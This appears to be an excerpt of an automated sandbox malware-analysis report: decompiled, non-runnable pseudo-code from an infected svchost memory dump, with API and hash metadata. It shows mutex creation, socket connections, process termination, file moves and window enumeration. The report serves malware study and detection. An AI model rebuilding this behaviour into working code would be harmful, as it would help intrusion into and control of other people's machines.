                                                            				return E0000022B22BAF55A7C0(0x1f0003, _t64, _v24 ^ _t83); // 0x1f0003 = EVENT_ALL_ACCESS, the dwDesiredAccess passed to OpenEventW
                                                            			}
                                                            0x22baf54bfa9
                                                            0x22baf54bfb3
                                                            0x22baf54bfc0
                                                            0x22baf54bfc7
                                                            0x22baf54bfd4
                                                            0x22baf54bfe7
                                                            0x22baf54bfed
                                                            0x22baf54bff9
                                                            0x22baf54c003
                                                            0x22baf54c008
                                                            0x22baf54c00e
                                                            0x22baf54c013
                                                            0x22baf54c02d
                                                            0x22baf54c03d
                                                            0x22baf54c047
                                                            0x22baf54c04c
                                                            0x22baf54c056
                                                            0x22baf54c05b
                                                            0x22baf54c068
                                                            0x22baf54c070
                                                            0x22baf54c076
                                                            0x22baf54c078
                                                            0x22baf54c084
                                                            0x22baf54c093
                                                            0x22baf54c0a9
                                                            0x22baf54c0be
                                                            0x22baf54c0c7
                                                            0x22baf54c0cc
                                                            0x22baf54c0ee

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                            • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 1348839613-2346361075
                                                            • Opcode ID: 13e48f42e489427479eefd822e829f2e49af3a9b2f823b032c9cf69266f59241
                                                            • Instruction ID: 299071d036a4ef9888e9bace4b2ea590d890fc7baaeb7fa94a035ee4269e72be
                                                            • Opcode Fuzzy Hash: 13e48f42e489427479eefd822e829f2e49af3a9b2f823b032c9cf69266f59241
                                                            • Instruction Fuzzy Hash: C431B433325B85A6EB21CF91F48C7DAB3A0FBC4744F801115A69E43A9ADF39C109CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			// Creates a named mutex whose name is derived from "rebootshutdown" via E0000022B22BAF549800 and wsprintfW.
                                                            			// If the mutex already exists (ERROR_ALREADY_EXISTS) it waits on it, then retries E0000022B22BAF54CF80 with a
                                                            			// Sleep between attempts until it returns nonzero, releases the mutex and closes the handle.
                                                            			E0000022B22BAF54D7E0(void* __edi, void* __eflags, long long __rbx, long long __rdi, void* __r8, long long _a8, long long _a16) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				char _v648;
                                                            				void* __rsi;
                                                            				signed long long _t43;
                                                            				signed long long _t44;
                                                            				long long _t45;
                                                            				long long _t58;
                                                            				void* _t61;
                                                            				void* _t63;
                                                            
                                                            				_t58 = __rdi;
                                                            				_t45 = __rbx;
                                                            				_a16 = __rbx;
                                                            				_t43 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t44 = _t43 ^ _t63 - 0x000002a0;
                                                            				_v24 = _t44;
                                                            				_v648 = 0;
                                                            				E0000022B22BAF54C100(__eflags,  &_v648, __rdi, _t61);
                                                            				_t62 = _t44;
                                                            				if (_t44 == 0) goto 0xaf54d8cf;
                                                            				_a8 = _t58;
                                                            				E0000022B22BAF549800(__rbx, L"rebootshutdown",  &_v632, _t44);
                                                            				wsprintfW(??, ??);
                                                            				CreateMutexW(??, ??, ??);
                                                            				if (_t44 == 0) goto 0xaf54d882;
                                                            				if (GetLastError() != 0xb7) goto 0xaf54d882; // 0xb7 = ERROR_ALREADY_EXISTS: another instance holds the mutex, wait for it
                                                            				WaitForSingleObject(??, ??);
                                                            				if (E0000022B22BAF54CF80(0, _t45, _t44) != 0) goto 0xaf54d8a8;
                                                            				Sleep(??);
                                                            				if (E0000022B22BAF54CF80(1, _t45, _t44) == 0) goto 0xaf54d890;
                                                            				if (_t44 == 0) goto 0xaf54d8bf;
                                                            				ReleaseMutex(??);
                                                            				CloseHandle(??);
                                                            				E0000022B22BAF55A7E4(_t44, _t62);
                                                            				return E0000022B22BAF55A7C0(5, _t44, _v24 ^ _t63 - 0x000002a0);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseQueryValue$MutexOpenwsprintf$CreateErrorHandleLastObjectReleaseSingleSleepWait
                                                            • String ID: Global\%s$rebootshutdown
                                                            • API String ID: 3033219564-2939806910
                                                            • Opcode ID: 87882329ecb1915067032cc862e5764066a434f0293172f8a78f4b9aa2aeab17
                                                            • Instruction ID: 472046e2f6dd5cae4dfb5ab005b5f7aa06f183af13378ec65c08ccc49a208a63
                                                            • Opcode Fuzzy Hash: 87882329ecb1915067032cc862e5764066a434f0293172f8a78f4b9aa2aeab17
                                                            • Instruction Fuzzy Hash: 7E218333605B84B2FB329BA0E45E3EA73A2FB84B85F454511D94A02B9BDF3EC005CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F69(void* __rax, long long __rbx, long long _a120) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t18;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t18);
                                                            				goto 0xaf546b40;
                                                            				_a120 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t18, _t20, _t24, _t25, _t26);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t18 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
                                                            • String ID:
                                                            • API String ID: 3671983395-0
                                                            • Opcode ID: 1d2ae70eb742d11d9b0820137612087e259c746ecb2b3f78082d02e006878018
                                                            • Instruction ID: a1cdd1a14e45031a99ee5cf44ffac0f52f6ad850af393cd4a90af44a677e7356
                                                            • Opcode Fuzzy Hash: 1d2ae70eb742d11d9b0820137612087e259c746ecb2b3f78082d02e006878018
                                                            • Instruction Fuzzy Hash: D8316F32314B54A6EF36DB52B85C3A9B7A5FB89B81F040125DE9947B9ADF3EC4058700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E0000022B22BAF538B60(long long __rax, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                            				void* _t28;
                                                            				void* _t31;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				long long _t42;
                                                            				intOrPtr* _t45;
                                                            
                                                            				_t42 = __rax;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_a24 = __rdi;
                                                            				_t45 = __rcx;
                                                            				 *__rcx = 0;
                                                            				 *((long long*)(__rcx + 0x20)) = __rax;
                                                            				 *((long long*)(__rcx + 0x30)) = __rax;
                                                            				 *((short*)(__rcx + 0x28)) = 2;
                                                            				LoadLibraryA(??);
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				GetProcAddress(??, ??);
                                                            				 *((long long*)(__rcx + 8)) = __rax;
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				GetProcAddress(??, ??);
                                                            				 *((long long*)(__rcx + 0x10)) = __rax;
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				GetProcAddress(??, ??);
                                                            				 *((long long*)(__rcx + 0x18)) = __rax;
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				if ( *((intOrPtr*)(__rcx + 8))() != 0) goto 0xaf538c29;
                                                            				E0000022B22BAF55A828(_t31, __rax);
                                                            				 *((long long*)(__rcx + 0x30)) = _t42;
                                                            				if (_t42 == 0) goto 0xaf538c29;
                                                            				r8d =  *((intOrPtr*)(__rcx + 0x20));
                                                            				_t28 = E0000022B22BAF563830( *((intOrPtr*)(__rcx + 0x20)), 0, _t33, _t34, _t42, __rcx + 0x20, __rdi, __rcx + 0x24);
                                                            				 *_t45 = 1;
                                                            				return _t28;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                            • API String ID: 2238633743-2202537490
                                                            • Opcode ID: b2fd1c3da6a43bd36a118979feb720e0a350d83a7864e98477ea050774342f8b
                                                            • Instruction ID: ebce8d7a1c4aafe027eb69adc324f60943a2d7b5d9b77ef6711afb6efa7d2c7f
                                                            • Opcode Fuzzy Hash: b2fd1c3da6a43bd36a118979feb720e0a350d83a7864e98477ea050774342f8b
                                                            • Instruction Fuzzy Hash: EA217C77212B44A1EF6ADFAAE45C29873B0FB08B84F041525CA4C4739AEF3AC455C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 42%
                                                            			E0000022B22BAF53B6F0(void* __edx, WCHAR* __rbx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                                            				signed int _t45;
                                                            				signed char _t73;
                                                            				signed long long _t83;
                                                            				signed long long _t86;
                                                            				WCHAR* _t93;
                                                            				WCHAR* _t97;
                                                            				WCHAR* _t101;
                                                            				long long _t113;
                                                            				void* _t116;
                                                            				signed int* _t117;
                                                            				void* _t119;
                                                            				signed long long _t120;
                                                            				signed long long _t121;
                                                            
                                                            				_t124 = __r9;
                                                            				_t113 = __rdi;
                                                            				_t93 = __rbx;
                                                            				_t120 = _t119 - 0x240;
                                                            				_t83 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t120 + 0x230) = _t83 ^ _t120;
                                                            				r9d = 0;
                                                            				_t3 = _t124 + 8; // 0x8
                                                            				r8d = _t3;
                                                            				E0000022B22BAF549B50(__rbx, L"winssyslog", _t120 + 0x20, __r9);
                                                            				_t45 = GetFileAttributesW(__rbx) & 0xffffff00 | _t44 != 0xffffffff;
                                                            				 *0xaf599c11 = _t45;
                                                            				if (_t45 != 0) goto 0xaf53b757;
                                                            				Sleep(??);
                                                            				_t73 =  *0xaf599c11; // 0x0
                                                            				if (_t73 == 0) goto 0xaf53b744;
                                                            				E0000022B22BAF53D9E0(_t73);
                                                            				if (( *0xaf599c11 & 0x000000ff) != 1) goto 0xaf53b786;
                                                            				asm("o16 nop [eax+eax]");
                                                            				Sleep(??);
                                                            				if (( *0xaf599c11 & 0x000000ff) == 1) goto 0xaf53b770;
                                                            				_t97 =  *0xaf599e30; // 0x0
                                                            				if (_t97 == 0) goto 0xaf53b740;
                                                            				if ( *((intOrPtr*)(_t97 + 8)) == 0) goto 0xaf53b7c3;
                                                            				TerminateThread(??, ??);
                                                            				CloseHandle(??);
                                                            				_t101 =  *0xaf599e30; // 0x0
                                                            				 *(_t101 + 8) = _t93;
                                                            				UnmapViewOfFile(??);
                                                            				CloseHandle(??);
                                                            				 *0xaf599e30 = _t93;
                                                            				goto 0xaf53b740;
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				 *(_t120 + 8) = _t93;
                                                            				 *((long long*)(_t120 + 0x10)) = __rdi;
                                                            				_t117 = _t120 - 0x10;
                                                            				_t121 = _t120 - 0x110;
                                                            				_t86 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *_t117 = _t86 ^ _t121;
                                                            				E0000022B22BAF538B60(_t86 ^ _t121, _t93, _t121 + 0x50, __rdi, __rsi);
                                                            				 *((char*)(_t117 - 0x40)) = 0x43;
                                                            				 *((long long*)(_t117 - 0x60)) = _t113;
                                                            				 *((long long*)(_t117 - 0x68)) = 0xaf588810;
                                                            				 *((long long*)(_t117 - 0x50)) = _t113;
                                                            				 *((long long*)(_t117 - 0x58)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t117 - 0x18)) = 0;
                                                            				 *((long long*)(_t117 - 0x28)) = _t113;
                                                            				 *((long long*)(_t117 - 0x20)) = _t113;
                                                            				 *((intOrPtr*)(_t117 - 0x3c)) = 0;
                                                            				 *((long long*)(_t117 - 0x78)) = _t113;
                                                            				 *((long long*)(_t117 - 0x70)) = _t113;
                                                            				 *((long long*)(_t117 - 0x48)) = _t113;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t117 - 0x38)) = _t113;
                                                            				if (( *(_t117 - 0x10) & 0x0000ffff) != 1) goto 0xaf53b91d;
                                                            				 *((short*)(_t121 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t121 + 0x20)) = _t113;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 - 0x78))))))(_t116) != 0) goto 0xaf53b988;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t121 + 0x50);
                                                            				if ( *((intOrPtr*)(_t117 - 0x28)) == 0) goto 0xaf53b8cb;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t117 - 0x78)))),  *((intOrPtr*)(_t117 - 0x28)));
                                                            				 *((long long*)(_t117 - 0x58)) = 0xaf588690;
                                                            				 *((long long*)(_t117 - 0x68)) = 0xaf588790;
                                                            				 *((intOrPtr*)(_t117 - 0x18)) = 0;
                                                            				 *((long long*)(_t117 - 0x28)) = _t113;
                                                            				 *((long long*)(_t117 - 0x20)) = _t113;
                                                            				if ( *((intOrPtr*)(_t117 - 0x80)) == 0) goto 0xaf53b8fa;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t117 - 0x80)));
                                                            				return E0000022B22BAF55A7C0(0x64, 0xaf588790,  *_t117 ^ _t121);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
                                                            • String ID: winssyslog
                                                            • API String ID: 3677296445-1874786851
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Read$Virtual$AllocCloseCreateFreeHandlePointerSize
                                                            • String ID:
                                                            • API String ID: 290806221-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0000022B22BAF5552D0(intOrPtr __eax, void* __rcx) {
                                                            				intOrPtr _v24;
                                                            				void* _t6;
                                                            				void* _t9;
                                                            				void* _t12;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				void* _t17;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            
                                                            				if (r8d - 0x18 < 0) goto 0xaf5552fd;
                                                            				_v24 = __eax;
                                                            				return E0000022B22BAF555620(_t6, _t9, __rcx + 0x258, _t12, _t13, _t14, _t15,  *((intOrPtr*)(__rcx + 0x238)), _t17, _t18, _t19, _t20, _t21);
                                                             			}

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 4082018349-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E0000022B22BAF534A58(long long __rbx, void* __rdx, void* __rdi, long long _a120, char _a128) {
                                                            				void* _t15;
                                                            				long long _t16;
                                                            				void* _t24;
                                                            				void* _t31;
                                                            
                                                            				_t16 = __rbx;
                                                            				_t24 = __rdx + 1;
                                                            				_pop(_t31);
                                                            				E0000022B22BAF534F40(_t15, __rbx, _t24 + 1);
                                                            				_a128 = 0x70;
                                                            				_a120 = _t16;
                                                            				lstrlenW(??);
                                                            				MoveFileW(??, ??);
                                                            				r9b = 0x3f;
                                                            				_a128 = 0x72;
                                                            				r8d = 1;
                                                            				return E0000022B22BAF531FF0( *((intOrPtr*)(_t31 + 8)),  &_a128);
                                                             			}

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E0000022B22BAF550900(intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a32, long long _a40, signed short _a48) {
                                                            				signed int _v56;
                                                            				char _v88;
                                                            				char _v120;
                                                            				void* _v128;
                                                            				void* _v136;
                                                            				void* __rbx;
                                                            				void* __rbp;
                                                            				long _t48;
                                                            				long _t50;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				void* _t64;
                                                            				signed long long _t77;
                                                            				long long _t83;
                                                            				void* _t84;
                                                            				intOrPtr* _t102;
                                                            				void* _t111;
                                                            
                                                            				_t103 = __rsi;
                                                            				_t77 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v56 = _t77 ^  &_v128;
                                                            				r14d = r8w & 0xffffffff;
                                                            				_t102 = __rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x160))() == 0) goto 0xaf550ae1;
                                                            				if (E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx) == 0) goto 0xaf550ae1;
                                                            				_a32 = __rsi;
                                                            				 *((intOrPtr*)( *__rcx + 0x168))();
                                                            				 *((intOrPtr*)(__rcx + 0x18)) = 1;
                                                            				_v128 =  &_v88;
                                                            				r9d = r14w & 0xffffffff;
                                                            				_v136 = _a40;
                                                            				 *((long long*)(__rcx + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(__rcx + 0x24)) = 1;
                                                            				_v120 = 0;
                                                            				_v88 = 0;
                                                            				if (E0000022B22BAF550CD0(_t57, _t64, E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx), _t84, __rcx, __rdx, __rsi, __rdx,  &_v120, _t111) == 0) goto 0xaf550a95;
                                                            				r9d = _a48 & 0x0000ffff;
                                                            				if (E0000022B22BAF550DF0(_t102,  &_v88,  &_v120) == 0) goto 0xaf550a86;
                                                            				SetLastError(??);
                                                            				if ( *((intOrPtr*)( *_t102 + 0xf0))() == 2) goto 0xaf550a6d;
                                                            				r8d = r9d;
                                                            				if (E0000022B22BAF550F10(_t43, _t84, _t102,  &_v120, _t103) == 0) goto 0xaf550a5e;
                                                            				_t83 = _t102 + 0x60;
                                                            				_v128 = _t83;
                                                            				_v136 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, _t83, _t84, _t102, _t103, 0xaf551060, _t102);
                                                            				 *((long long*)(_t102 + 0x58)) = _t83;
                                                            				if (_t83 == 0) goto 0xaf550a50;
                                                            				ResetEvent(??);
                                                            				goto 0xaf550ae3;
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 8;
                                                            				goto 0xaf550aa4;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 0xb;
                                                            				goto 0xaf550aa2;
                                                            				_t48 = GetLastError();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 5;
                                                            				_t49 =  ==  ? 0x4c7 : _t48;
                                                            				goto 0xaf550aa2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 4;
                                                            				goto 0xaf550aa2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 3;
                                                            				_t62 =  ==  ? 0x4c7 : _t48;
                                                            				SetLastError(??);
                                                            				 *((intOrPtr*)(_t102 + 0x18)) = 1;
                                                            				 *((long long*)(_t102 + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(_t102 + 0x24)) = 1;
                                                            				_t50 = GetLastError();
                                                            				 *((intOrPtr*)( *_t102 + 8))();
                                                            				SetLastError(??);
                                                            				goto 0xaf550ae3;
                                                            				return E0000022B22BAF55A7C0(_t50, _t83, _v56 ^  &_v128);
                                                             			}

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ResetSelectSwitchThread_invalid_parameter_noinfobindconnecthtons
                                                            • String ID:
                                                            • API String ID: 2826083042-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E0000022B22BAF552150(void* __ecx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a32, long long _a40, signed short _a48) {
                                                            				signed int _v56;
                                                            				char _v88;
                                                            				char _v120;
                                                            				void* _v128;
                                                            				void* _v136;
                                                            				void* __rbx;
                                                            				void* __rbp;
                                                            				long _t48;
                                                            				long _t50;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				void* _t64;
                                                            				signed long long _t77;
                                                            				long long _t83;
                                                            				void* _t84;
                                                            				intOrPtr* _t102;
                                                            				void* _t111;
                                                            
                                                            				_t103 = __rsi;
                                                            				_t57 = __ecx;
                                                            				_t77 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v56 = _t77 ^  &_v128;
                                                            				r14d = r8w & 0xffffffff;
                                                            				_t102 = __rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x160))() == 0) goto 0xaf552331;
                                                            				if (E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx) == 0) goto 0xaf552331;
                                                            				_a32 = __rsi;
                                                            				 *((intOrPtr*)( *__rcx + 0x168))();
                                                            				 *((intOrPtr*)(__rcx + 0x18)) = 1;
                                                            				_v128 =  &_v88;
                                                            				r9d = r14w & 0xffffffff;
                                                            				_v136 = _a40;
                                                            				 *((long long*)(__rcx + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(__rcx + 0x24)) = 1;
                                                            				_v120 = 0;
                                                            				_v88 = 0;
                                                            				if (E0000022B22BAF5523B0(_t57, _t64, E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx), _t84, __rcx, __rdx, __rsi, __rdx,  &_v120, _t111) == 0) goto 0xaf5522e5;
                                                            				r9d = _a48 & 0x0000ffff;
                                                            				if (E0000022B22BAF550DF0(_t102,  &_v88,  &_v120) == 0) goto 0xaf5522d6;
                                                            				SetLastError(??);
                                                            				if ( *((intOrPtr*)( *_t102 + 0xf0))() == 2) goto 0xaf5522bd;
                                                            				r8d = r9d;
                                                            				if (E0000022B22BAF5524F0(_t43, _t84, _t102,  &_v120) == 0) goto 0xaf5522ae;
                                                            				_t83 = _t102 + 0x60;
                                                            				_v128 = _t83;
                                                            				_v136 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, _t83, _t84, _t102, _t103, E0000022B22BAF552600, _t102);
                                                            				 *((long long*)(_t102 + 0x58)) = _t83;
                                                            				if (_t83 == 0) goto 0xaf5522a0;
                                                            				ResetEvent(??);
                                                            				goto 0xaf552333;
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 8;
                                                            				goto 0xaf5522f4;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 0xb;
                                                            				goto 0xaf5522f2;
                                                            				_t48 = GetLastError();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 5;
                                                            				_t49 =  ==  ? 0x4c7 : _t48;
                                                            				goto 0xaf5522f2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 4;
                                                            				goto 0xaf5522f2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 3;
                                                            				_t62 =  ==  ? 0x4c7 : _t48;
                                                            				SetLastError(??);
                                                            				 *((intOrPtr*)(_t102 + 0x18)) = 1;
                                                            				 *((long long*)(_t102 + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(_t102 + 0x24)) = 1;
                                                            				_t50 = GetLastError();
                                                            				 *((intOrPtr*)( *_t102 + 8))();
                                                            				SetLastError(??);
                                                            				goto 0xaf552333;
                                                            				return E0000022B22BAF55A7C0(_t50, _t83, _v56 ^  &_v128);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ResetSelectSwitchThread_invalid_parameter_noinfobindconnecthtons
                                                            • String ID:
                                                            • API String ID: 2826083042-0
                                                            • Opcode ID: 684fbcd5a7661f2e56074939b602afa10721d097a13773435bc64beb91d93878
                                                            • Instruction ID: 6117f302e106ac1a86f9c5d8bda8b89fce8bc6c30ad5616d7db0463e27b66eba
                                                            • Opcode Fuzzy Hash: 684fbcd5a7661f2e56074939b602afa10721d097a13773435bc64beb91d93878
                                                            • Instruction Fuzzy Hash: 9A517F37215B40A2EB758FA1EA0C3AE73A0FB88B85F004025DF4943B96DF7AC069C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$ErrorFreeHeapLast$send
                                                            • String ID:
                                                            • API String ID: 3617958714-0
                                                            • Opcode ID: ca3059caf0ab343c84aa3e129b0c3e82e832670cd34c6748d635095cf72d42f5
                                                            • Instruction ID: 3fe6bd48d449329be815873bef15be0e8a189e029ce0a19b68f1b3eb4e7d28c4
                                                            • Opcode Fuzzy Hash: ca3059caf0ab343c84aa3e129b0c3e82e832670cd34c6748d635095cf72d42f5
                                                            • Instruction Fuzzy Hash: 8B414733600A40A6EB768BA6E54C3DEB7B0F789B94F004415CB9E43B96EF3AD5958340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0000022B22BAF5477C0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16, void* _a32) {
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				int _t16;
                                                            				int _t20;
                                                            				void* _t23;
                                                            				void* _t36;
                                                            				char* _t37;
                                                            				void* _t57;
                                                            				void* _t58;
                                                            				void* _t65;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            
                                                            				_t36 = __rax;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rbp;
                                                            				_t67 = __rcx;
                                                            				if (r8d == 0) goto 0xaf547811;
                                                            				r8d =  *(_t57 + __rdx);
                                                            				OpenProcess(??, ??, ??);
                                                            				TerminateProcess(??, ??);
                                                            				CloseHandle(??);
                                                            				if (4 - r8d < 0) goto 0xaf5477e2;
                                                            				Sleep(??);
                                                            				E0000022B22BAF548150(_t23, r8d, __rax, __rdx, _t57, _t58, _t65, _t66);
                                                            				if (_t36 == 0) goto 0xaf54784d;
                                                            				_t16 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t16;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t67 + 8)), _t36);
                                                            				LocalFree(??);
                                                            				_a32 = 0;
                                                            				EnumWindows(??, ??);
                                                            				_t37 = _a32;
